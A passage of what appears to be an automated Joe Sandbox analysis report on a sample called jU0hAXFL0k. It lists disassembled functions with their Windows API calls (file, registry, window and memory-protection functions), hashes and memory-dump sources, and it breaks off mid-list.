                                                                                        • Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
                                                                                        • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                                        • Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE92A38 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumWindows.USER32(00000000), ref: 6FE92AF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1129996299-0
                                                                                        • Opcode ID: d4b5dc4a6d7889e7f1b5427915a90e6abce2b1a1313bcd4dc064756468beadde
                                                                                        • Instruction ID: 5f74883ab25792b659ab64dbc6526c329443861eafc99937ac25902af91cd095
                                                                                        • Opcode Fuzzy Hash: d4b5dc4a6d7889e7f1b5427915a90e6abce2b1a1313bcd4dc064756468beadde
                                                                                        • Instruction Fuzzy Hash: 5F414172504704EFDF20DFA4D981B593FB5FB66368F30842BE514C6290E736A8A18B72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402631 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2111968516-0
                                                                                        • Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                        • Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
                                                                                        • Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                        • Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004026EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                                                          • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointerwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327478801-0
                                                                                        • Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                                                        • Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
                                                                                        • Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                                                        • Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 390214022-0
                                                                                        • Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                                                        • Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
                                                                                        • Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                                                        • Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E8E Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 00405EB7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                                                        • Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
                                                                                        • Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                                                        • Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405C1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,00000020,?,004031B8,00000000,004128C0,00000020,004128C0,00000020,000000FF,?,00000000), ref: 00405C2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                                        • Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
                                                                                        • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                                        • Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405BEB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004031EA,00000000,00000000,00403047,000000FF,?,00000000,00000000,00000000), ref: 00405BFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                                        • Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
                                                                                        • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                                        • Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE92921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(6FE9404C,?,?,6FE9403C), ref: 6FE9293F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 2c864d7bb0a215fd2fe01a28caa1ea409da5754702e90e1f3d5bbb553bd48ba8
                                                                                        • Instruction ID: 9504bce6739133cba9b87601e2b507cfd40423ebcf535ef3a7c1905787eb4fbb
                                                                                        • Opcode Fuzzy Hash: 2c864d7bb0a215fd2fe01a28caa1ea409da5754702e90e1f3d5bbb553bd48ba8
                                                                                        • Instruction Fuzzy Hash: 60F09BB1908A84DECB60CF6988967053FE2B71B368B12C52BE568D6341E33648648B33
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004023A7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString
                                                                                        • String ID:
                                                                                        • API String ID: 1096422788-0
                                                                                        • Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                                                        • Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
                                                                                        • Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                                                        • Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E60 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EEE,?,?,?,?,00000002,Call), ref: 00405E84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID:
                                                                                        • API String ID: 71445658-0
                                                                                        • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                                        • Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
                                                                                        • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                                        • Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                        • Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
                                                                                        • Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                        • Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004040B4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                        • Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
                                                                                        • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                        • Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004031ED Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                        • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                                                        • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                        • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040409D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
